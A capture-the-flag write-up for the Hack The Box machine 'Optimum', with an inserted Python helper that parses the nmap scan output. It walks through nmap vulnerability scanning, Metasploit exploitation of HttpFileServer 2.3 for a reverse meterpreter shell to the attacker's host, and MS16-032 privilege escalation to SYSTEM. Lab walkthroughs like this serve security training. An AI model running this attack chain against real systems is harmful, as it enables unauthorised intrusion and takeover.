Optimum
Write up for the HTB machine 'Optimum'
1. Initial recon
1.1. nmap
nmap --script vuln 10.10.10.8
PORT STATE SERVICE
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-fileupload-exploiter:
|
|_ Couldn't find a file-type field.
| http-vuln-cve2011-3192:
| VULNERABLE:
| Apache byterange filter DoS
| State: VULNERABLE
| IDs: BID:49303 CVE:CVE-2011-3192
| The Apache web server is vulnerable to a denial of service attack when numerous
| overlapping byte ranges are requested.
| Disclosure date: 2011-08-19
| References:
| https://www.tenable.com/plugins/nessus/55976
| https://www.securityfocus.com/bid/49303
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192
|_ https://seclists.org/fulldisclosure/2011/Aug/175
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
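As an added helper that is not part of the original write-up, this Python script parses the nmap output above into per-script findings and tags the denial-of-service results, which is the triage done by eye in the next step; the embedded input is a trimmed copy of the listing above.

```python
import re
# Sample input: the nmap --script vuln output for 10.10.10.8 shown above, trimmed to the key lines
# (constructed from the page's listing) so the helper runs offline.
NMAP_OUTPUT = """\
80/tcp open http
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| http-vuln-cve2011-3192:
| VULNERABLE:
| Apache byterange filter DoS
| State: VULNERABLE
| IDs: BID:49303 CVE:CVE-2011-3192
|_http-dombased-xss: Couldn't find any DOM based XSS.
"""
# An NSE script block starts with its lower-case script name followed by a colon.
SCRIPT_HEADER = re.compile(r"^([a-z][a-z0-9-]*):")

def parse_vuln_scripts(text):
    """Map script name -> {'title', 'state', 'ids'} for each script that printed a State line."""
    findings, current, prev = {}, None, ""
    for raw in text.splitlines():
        line = raw.lstrip("|_ ").rstrip()  # drop nmap's '| ' / '|_' left margin
        header = SCRIPT_HEADER.match(line)
        if header:
            current = header.group(1)
            findings[current] = {"title": None, "state": None, "ids": []}
        elif current:
            if line.startswith("State:"):
                findings[current]["state"] = line.split(":", 1)[1].strip()
            elif line.startswith("IDs:"):
                findings[current]["ids"] = line.split(":", 1)[1].split()
            elif prev == "VULNERABLE:" and line:
                findings[current]["title"] = line  # first line after 'VULNERABLE:' names the finding
        prev = line
    return {k: v for k, v in findings.items() if v["state"]}

def triage(findings):
    """Return (script, state, cves, dos_only) per flagged script; DoS results are tagged for set-aside."""
    rows = []
    for name, f in sorted(findings.items()):
        if f["state"].startswith("NOT") or "VULNERABLE" not in f["state"]:
            continue
        cves = [i.split(":", 1)[1] for i in f["ids"] if i.startswith("CVE:")]
        dos_only = bool(re.search(r"\b(dos|denial)\b", f["title"] or "", re.I))
        rows.append((name, f["state"], cves, dos_only))
    return rows
```

On this listing both flagged findings come back tagged as DoS-only, which is why the write-up moves on to the web application itself.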
1.2. website recon
Even though nmap reveals some vulnerabilities, both are denial-of-service issues and we're looking for remote code execution, so let's visit the web application in the browser.
We can see that it is running HttpFileServer 2.3.
2. msfconsole
Let's start by running
search HttpFileServer 2.3
in msfconsole.
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/rejetto_hfs_exec 2014-09-11 excellent Yes Rejetto HttpFileServer Remote Command Execution
Let's use this exploit by running
use 0
We need to set the options for the exploit:
set rhost 10.10.10.8
set lhost YOUR_IP
and then run
exploit
to get our meterpreter shell.
Then we can find the user flag at C:\Users\kostas\Desktop
3. root.txt
Let's try to find a vector to escalate our privileges. Within our meterpreter shell, run
run post/multi/recon/local_exploit_suggester
and we can see that
exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
has potential.
So let's use this exploit. Put the current session in the background using ctrl+z, then run
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
and set the options:
set lhost YOUR_IP
set session SESSION_NUMBER
You can check the session number using sessions.
Finally, run
exploit
to launch it. Once we have a meterpreter shell we can run
shell
and then
whoami
to confirm that we are nt authority\system.
The root flag can be found at C:\Users\Administrator\Desktop